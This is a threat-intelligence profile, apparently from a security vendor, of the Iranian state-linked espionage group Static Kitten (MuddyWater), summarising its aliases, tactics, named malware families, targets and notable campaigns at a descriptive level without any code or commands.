Threat Actor Profile

Static Kitten

Static Kitten, also known as MuddyWater, Seedworm, TEMP.Zagros, and Mercury, is a sophisticated Iranian state-sponsored cyberespionage group that has operated since at least 2017. Strongly linked to Iran's Ministry of Intelligence and Security (MOIS), this group employs a variety of advanced tactics and techniques, including spear-phishing campaigns, PowerShell-based backdoors, and Android spyware, to target governments, academia, telecommunications, and NGOs primarily in the Middle East and Central Asia.

Threat Actor Profile

Static Kitten

Country of Origin

Static Kitten originates from Iran and is heavily associated with the country’s Ministry of Intelligence and Security (MOIS). This attribution is widely supported by multiple cybersecurity reports and analyses.

Members

The specific size and composition of Static Kitten remain unknown. The group utilizes a range of aliases, such as MuddyWater, Seedworm, and Mercury, to mask its operations, making attribution to individual members challenging.

Leadership

The leadership structure of Static Kitten is not publicly documented. However, given its ties to MOIS, it is assumed the group operates under the direct or indirect oversight of Iranian intelligence authorities.

Static Kitten TTPs

Tactics

Static Kitten’s primary motivation is to conduct espionage, focusing on intelligence gathering for geopolitical and economic advantages. This includes stealing sensitive data and intellectual property from strategic entities.

Techniques

To achieve its espionage objectives, Static Kitten frequently employs social engineering techniques, such as spear-phishing emails with malicious documents or links. The group also exploits legitimate tools like file-sharing platforms and remote management tools for covert operations.

Procedures

Static Kitten leverages POWERSTATS and NTSTATS PowerShell backdoors, Android spyware (e.g., DCHSpy), and custom malware like BugSleep and MuddyRot. Additionally, it uses legitimate tools like ScreenConnect and MSI installers in its campaigns to mask malicious activities and evade detection.

Want to Shut Down Threats Before They Start?

Indicators of Compromise (IoCs)

Static Kitten’s operations leave behind several IoCs, including malicious domains, spear-phishing email headers, PowerShell malware hashes, and indicators related to Android spyware such as app permissions and sideloaded packages.

Key Victims

Static Kitten primarily targets government agencies, foreign affairs ministries, academic institutions, and telecommunications providers within the Middle East. Other prominent victims include NGOs, media outlets, and expatriate communities.

Notable Cyberattacks

One significant campaign in 2021 targeted government agencies in Kuwait and the UAE using Israeli-themed lures tied to ministries of foreign affairs. More recently, in 2024, Static Kitten expanded its operations with the development of a new attack framework, DarkBeatC2, and the deployment of BugSleep and MuddyRot implants to target Israel and other strategic regions.

Law Enforcement & Arrests

To date, there have been no confirmed arrests or law enforcement actions targeting Static Kitten, reflecting the challenges of addressing state-sponsored cyber threats at an international level.